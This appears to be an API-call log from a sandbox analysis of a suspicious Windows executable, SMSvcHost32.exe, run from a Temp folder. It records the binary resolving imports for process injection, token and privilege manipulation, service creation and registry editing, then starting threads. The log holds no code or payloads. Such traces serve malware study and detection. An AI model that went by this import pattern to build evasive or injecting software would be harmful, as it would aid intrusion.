	[0088.514] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAllocEx") returned 0x765e2730
	[0088.514] GetProcAddress (hModule=0x765a0000, lpProcName="IsBadReadPtr") returned 0x765b2510
	[0088.514] GetProcAddress (hModule=0x765a0000, lpProcName="GetCommandLineW") returned 0x765baba0
	[0088.514] GetProcAddress (hModule=0x765a0000, lpProcName="CreateMutexW") returned 0x765c66f0
	[0088.514] GetProcAddress (hModule=0x765a0000, lpProcName="CreateToolhelp32Snapshot") returned 0x765c7b50
	[0088.514] GetProcAddress (hModule=0x765a0000, lpProcName="Process32NextW") returned 0x765bd290
	[0088.515] GetProcAddress (hModule=0x765a0000, lpProcName="Process32FirstW") returned 0x765bf5a0
	[0088.515] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeThread") returned 0x765c4f40
	[0088.515] GetProcAddress (hModule=0x765a0000, lpProcName="WriteProcessMemory") returned 0x765e2850
	[0088.515] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalMemoryStatusEx") returned 0x765bafe0
	[0088.515] GetProcAddress (hModule=0x765a0000, lpProcName="OpenMutexW") returned 0x765c6770
	[0088.515] GetProcAddress (hModule=0x765a0000, lpProcName="MultiByteToWideChar") returned 0x765b2ad0
	[0088.515] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersionExW") returned 0x765baa80
	[0088.515] GetProcAddress (hModule=0x765a0000, lpProcName="FormatMessageA") returned 0x765bf830
	[0088.515] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpiA") returned 0x765b7830
	[0088.516] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileAttributesW") returned 0x765c6a50
	[0088.516] GetProcAddress (hModule=0x765a0000, lpProcName="MoveFileExW") returned 0x765bb2b0
	[0088.516] GetProcAddress (hModule=0x765a0000, lpProcName="CopyFileW") returned 0x765c6ec0
	[0088.516] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpW") returned 0x765b7970
	[0088.516] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenW") returned 0x765b3690
	[0088.516] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableA") returned 0x765e22f0
	[0088.516] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemInfo") returned 0x765ba0f0
	[0088.516] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateThread") returned 0x765c0160
	[0088.517] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableA") returned 0x765ba8a0
	[0088.517] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileTime") returned 0x765c6a90
	[0088.517] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemTime") returned 0x765c4940
	[0088.517] GetProcAddress (hModule=0x765a0000, lpProcName="SystemTimeToFileTime") returned 0x765c4c10
	[0088.517] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileSize") returned 0x765c6a70
	[0088.517] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteFileW") returned 0x765c68c0
	[0088.517] GetProcAddress (hModule=0x765a0000, lpProcName="FindClose") returned 0x765c68e0
	[0088.517] GetProcAddress (hModule=0x765a0000, lpProcName="SetEndOfFile") returned 0x765c6c00
	[0088.517] GetProcAddress (hModule=0x765a0000, lpProcName="SetFilePointer") returned 0x765c6c40
	[0088.518] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileTime") returned 0x765c6c60
	[0088.518] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtect") returned 0x765b7a50
	[0088.518] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0088.518] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcess") returned 0x765b38c0
	[0088.518] GetProcAddress (hModule=0x765a0000, lpProcName="ExpandEnvironmentStringsW") returned 0x765bcd50
	[0088.518] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateProcess") returned 0x765c5100
	[0088.518] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForMultipleObjects") returned 0x765c6800
	[0088.518] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteAtom") returned 0x765bcb20
	[0088.518] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenA") returned 0x765b8c80
	[0088.519] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForSingleObject") returned 0x765c6820
	[0088.519] GetProcAddress (hModule=0x765a0000, lpProcName="ExitThread") returned 0x779c7a80
	[0088.519] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleA") returned 0x765b99f0
	[0088.519] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAddAtomW") returned 0x765b1be0
	[0088.519] GetProcAddress (hModule=0x765a0000, lpProcName="OpenProcess") returned 0x765b8bf0
	[0088.519] GetProcAddress (hModule=0x765a0000, lpProcName="ProcessIdToSessionId") returned 0x765b8fa0
	[0088.519] GetProcAddress (hModule=0x765a0000, lpProcName="Sleep") returned 0x765b7990
	[0088.520] GetProcAddress (hModule=0x765a0000, lpProcName="GetLastError") returned 0x765b3870
	[0088.520] GetProcAddress (hModule=0x765a0000, lpProcName="LoadLibraryA") returned 0x765c4bf0
	[0088.520] GetProcAddress (hModule=0x765a0000, lpProcName="CloseHandle") returned 0x765c6630
	[0088.520] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThread") returned 0x765b9b90
	[0088.520] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0088.520] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcAddress") returned 0x765b78b0
	[0088.520] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomW") returned 0x765b20f0
	[0088.520] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcessId") returned 0x765b23e0
	[0088.521] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessHeap") returned 0x765b7710
	[0088.521] GetProcAddress (hModule=0x765a0000, lpProcName="CreateProcessW") returned 0x765bb000
	[0088.521] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleW") returned 0x765b9bc0
	[0088.521] GetProcAddress (hModule=0x765a0000, lpProcName="FreeLibrary") returned 0x765b9f50
	[0088.521] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeProcess") returned 0x765bfdb0
	[0088.521] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemDirectoryW") returned 0x765b9fd0
	[0088.521] GetProcAddress (hModule=0x765a0000, lpProcName="OutputDebugStringA") returned 0x765bfde0
	[0088.521] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyA") returned 0x765bea30
	[0088.522] GetProcAddress (hModule=0x765a0000, lpProcName="ExitProcess") returned 0x765c7b30
	[0088.522] GetProcAddress (hModule=0x765a0000, lpProcName="SetProcessPriorityBoost") returned 0x765bfef0
	[0088.522] GetProcAddress (hModule=0x765a0000, lpProcName="SetPriorityClass") returned 0x765b9e90
	[0088.522] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleFileNameW") returned 0x765b9b00
	[0088.522] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadPriority") returned 0x765b9990
	[0088.522] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableW") returned 0x765b9970
	[0088.522] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentThread") returned 0x765b75f0
	[0088.522] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcatW") returned 0x765dd170
	[0088.522] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAlloc") returned 0x765b9950
	[0088.523] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFree") returned 0x765bccf0
	[0088.523] GetProcAddress (hModule=0x765a0000, lpProcName="LocalFree") returned 0x765b79a0
	[0088.523] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyW") returned 0x765dd260
	[0088.523] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpA") returned 0x765bcc30
	[0088.523] GetProcAddress (hModule=0x765a0000, lpProcName="ReadFile") returned 0x765c6bb0
	[0088.523] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableW") returned 0x765be9e0
	[0088.523] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempPathW") returned 0x765c6b30
	[0088.523] GetProcAddress (hModule=0x765a0000, lpProcName="CreateFileW") returned 0x765c6890
	[0088.523] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempFileNameW") returned 0x765c6b10
	[0088.524] GetProcAddress (hModule=0x765a0000, lpProcName="LocalAlloc") returned 0x765b7a30
	[0088.524] GetProcAddress (hModule=0x765a0000, lpProcName="HeapReAlloc") returned 0x7798efe0
	[0088.524] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualFree") returned 0x765b7600
	[0088.524] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAlloc") returned 0x765b7810
	[0088.524] GetProcAddress (hModule=0x765a0000, lpProcName="RemoveDirectoryW") returned 0x765c6bf0
	[0088.524] GetProcAddress (hModule=0x765a0000, lpProcName="WriteFile") returned 0x765c6ca0
	[0088.525] GetProcAddress (hModule=0x765a0000, lpProcName="DuplicateHandle") returned 0x765c6640
	[0088.525] GetProcAddress (hModule=0x765a0000, lpProcName="DisconnectNamedPipe") returned 0x765e0990
	[0088.525] GetProcAddress (hModule=0x765a0000, lpProcName="FlushFileBuffers") returned 0x765c69b0
	[0088.525] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersion") returned 0x765baaf0
	[0088.525] GetProcAddress (hModule=0x765a0000, lpProcName="CreateEventW") returned 0x765c66b0
	[0088.525] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameW") returned 0x765c46a0
	[0088.525] GetProcAddress (hModule=0x765a0000, lpProcName="WideCharToMultiByte") returned 0x765b3880
	[0088.525] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0088.525] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameA") returned 0x765bfbf0
	[0088.526] GetProcAddress (hModule=0x765a0000, lpProcName="GetShortPathNameW") returned 0x765b2b90
	[0088.526] GetProcAddress (hModule=0x765a0000, lpProcName="FindFirstFileW") returned 0x765c6960
	[0088.526] GetProcAddress (hModule=0x765a0000, lpProcName="FindNextFileW") returned 0x765c69a0
	[0088.526] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.526] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x77810000
	[0088.526] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.526] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfW") returned 0x7783f890
	[0088.526] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfA") returned 0x778404a0
	[0088.526] GetProcAddress (hModule=0x77810000, lpProcName="ExitWindowsEx") returned 0x77879430
	[0088.526] GetProcAddress (hModule=0x77810000, lpProcName="GetShellWindow") returned 0x7782ff50
	[0088.527] GetProcAddress (hModule=0x77810000, lpProcName="GetForegroundWindow") returned 0x77848cb0
	[0088.527] GetProcAddress (hModule=0x77810000, lpProcName="TranslateMessage") returned 0x7782d9b0
	[0088.527] GetProcAddress (hModule=0x77810000, lpProcName="GetWindowThreadProcessId") returned 0x7782da50
	[0088.527] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.527] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x74aa0000
	[0088.527] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.527] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameA") returned 0x74ac2910
	[0088.527] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupAccountSidW") returned 0x74abf590
	[0088.527] GetProcAddress (hModule=0x74aa0000, lpProcName="DuplicateTokenEx") returned 0x74ac0ad0
	[0088.528] GetProcAddress (hModule=0x74aa0000, lpProcName="GetLengthSid") returned 0x74abf570
	[0088.528] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateProcessAsUserW") returned 0x74ac2c10
	[0088.528] GetProcAddress (hModule=0x74aa0000, lpProcName="FreeSid") returned 0x74ac0440
	[0088.528] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenProcessToken") returned 0x74abf520
	[0088.528] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExA") returned 0x74ac0a20
	[0088.528] GetProcAddress (hModule=0x74aa0000, lpProcName="AllocateAndInitializeSid") returned 0x74abf660
	[0088.528] GetProcAddress (hModule=0x74aa0000, lpProcName="SetTokenInformation") returned 0x74ac3840
	[0088.528] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyA") returned 0x74ac09d0
	[0088.528] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCloseKey") returned 0x74abf620
	[0088.529] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertSidToStringSidW") returned 0x74abf060
	[0088.529] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupPrivilegeValueA") returned 0x74ad4dc0
	[0088.529] GetProcAddress (hModule=0x74aa0000, lpProcName="AdjustTokenPrivileges") returned 0x74ac0980
	[0088.529] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExW") returned 0x74abf330
	[0088.529] GetProcAddress (hModule=0x74aa0000, lpProcName="RegDeleteValueW") returned 0x74ac0fb0
	[0088.529] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExW") returned 0x74abf350
	[0088.529] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeAcl") returned 0x74abfa80
	[0088.529] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeSecurityDescriptor") returned 0x74abfc00
	[0088.530] GetProcAddress (hModule=0x74aa0000, lpProcName="AddAce") returned 0x74ac1ee0
	[0088.530] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExW") returned 0x74abf7f0
	[0088.530] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetKeySecurity") returned 0x74ad7830
	[0088.530] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyExW") returned 0x74abfa20
	[0088.530] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAce") returned 0x74ac2550
	[0088.530] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAclInformation") returned 0x74ac2570
	[0088.530] GetProcAddress (hModule=0x74aa0000, lpProcName="RegGetKeySecurity") returned 0x74ac4190
	[0088.530] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSecurityDescriptorDacl") returned 0x74abfc50
	[0088.531] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74abf830
	[0088.531] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExA") returned 0x74abf790
	[0088.531] GetProcAddress (hModule=0x74aa0000, lpProcName="CheckTokenMembership") returned 0x74abfb50
	[0088.531] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateWellKnownSid") returned 0x74ac0af0
	[0088.531] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthority") returned 0x74ac0ab0
	[0088.531] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthorityCount") returned 0x74ac0eb0
	[0088.531] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExA") returned 0x74abf500
	[0088.531] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x74ac3ba0
	[0088.532] GetProcAddress (hModule=0x74aa0000, lpProcName="SetEntriesInAclW") returned 0x74ac2bf0
	[0088.532] GetProcAddress (hModule=0x74aa0000, lpProcName="SetFileSecurityW") returned 0x74ac41d0
	[0088.532] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyW") returned 0x74abfaa0
	[0088.532] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameW") returned 0x74ac1030
	[0088.532] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceW") returned 0x74ac4210
	[0088.532] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenSCManagerW") returned 0x74ac0ed0
	[0088.532] GetProcAddress (hModule=0x74aa0000, lpProcName="CloseServiceHandle") returned 0x74ac0960
	[0088.532] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateServiceW") returned 0x74ad65d0
	[0088.533] GetProcAddress (hModule=0x74aa0000, lpProcName="SetServiceStatus") returned 0x74ac0fd0
	[0088.533] GetProcAddress (hModule=0x74aa0000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x74ac12f0
	[0088.533] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceCtrlDispatcherW") returned 0x74ac12b0
	[0088.533] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyA") returned 0x74ac2500
	[0088.533] GetProcAddress (hModule=0x74aa0000, lpProcName="GetTokenInformation") returned 0x74abf370
	[0088.546] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.546] GetModuleHandleA (lpModuleName="Secur32.dll") returned 0x0
	[0088.546] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x6ff60000
	[0088.548] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.548] GetProcAddress (hModule=0x6ff60000, lpProcName="GetUserNameExW") returned 0x7469c5f0
	[0088.548] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.548] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75120000
	[0088.548] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.548] GetProcAddress (hModule=0x75120000, lpProcName="ShellExecuteExW") returned 0x752be690
	[0088.548] GetProcAddress (hModule=0x75120000, lpProcName=0x2a8) returned 0x753cdb90
	[0088.548] GetProcAddress (hModule=0x75120000, lpProcName="SHChangeNotify") returned 0x7527cd10
	[0088.549] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.549] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x771d0000
	[0088.549] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0088.549] GetProcAddress (hModule=0x771d0000, lpProcName="CoTaskMemFree") returned 0x748d9170
	[0088.549] GetProcAddress (hModule=0x771d0000, lpProcName="CoCreateInstance") returned 0x74900060
	[0088.549] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitialize") returned 0x77201930
	[0088.549] GetProcAddress (hModule=0x771d0000, lpProcName="CoUninitialize") returned 0x748d92a0
	[0088.549] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitializeEx") returned 0x748d88d0
	[0088.549] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0088.549] VirtualFree (lpAddress=0x7b0000, dwSize=0x32e00, dwFreeType=0x4000) returned 1
	[0088.551] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0088.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x413e60, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d0
	[0088.551] CloseHandle (hObject=0x1d0) returned 1
	[0088.551] GetCurrentProcess () returned 0xffffffff
	[0088.551] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0xffffffff) 

Thread:
	id = 108
	os_tid = 0xc18


Thread:
	id = 109
	os_tid = 0xc24

	[0088.554] GetModuleHandleA (lpModuleName="kernel32") returned 0x765a0000
	[0088.554] GetProcAddress (hModule=0x765a0000, lpProcName="SetErrorMode") returned 0x765b8d20
	[0088.554] SetErrorMode (uMode=0x0) returned 0x0
	[0088.554] SetErrorMode (uMode=0x2) returned 0x0
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.554] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.555] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] GetLastError () returned 0x57
	[0088.556] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75120000
	[0088.556] GetProcAddress (hModule=0x75120000, lpProcName="CommandLineToArgvW") returned 0x752cbf80
	[0088.556] GetCommandLineW () returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	[0088.556] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", pNumArgs=0x20afdec | out: pNumArgs=0x20afdec) returned 0x4fb708*="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0088.557] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x507510, nSize=0x104 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 0x34
	[0088.557] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0088.557] GetCurrentProcess () returned 0xffffffff
	[0088.557] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20afdbc | out: TokenHandle=0x20afdbc*=0x1d0) returned 1
	[0088.557] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20afdc8 | out: TokenInformation=0x0, ReturnLength=0x20afdc8) returned 0
	[0088.557] GetLastError () returned 0x7a
	[0088.557] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x4f7a00, TokenInformationLength=0x24, ReturnLength=0x20afdc8 | out: TokenInformation=0x4f7a00, ReturnLength=0x20afdc8) returned 1
	[0088.557] ConvertSidToStringSidW () returned 0x1
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
	[0088.557] GetLastError () returned 0x0
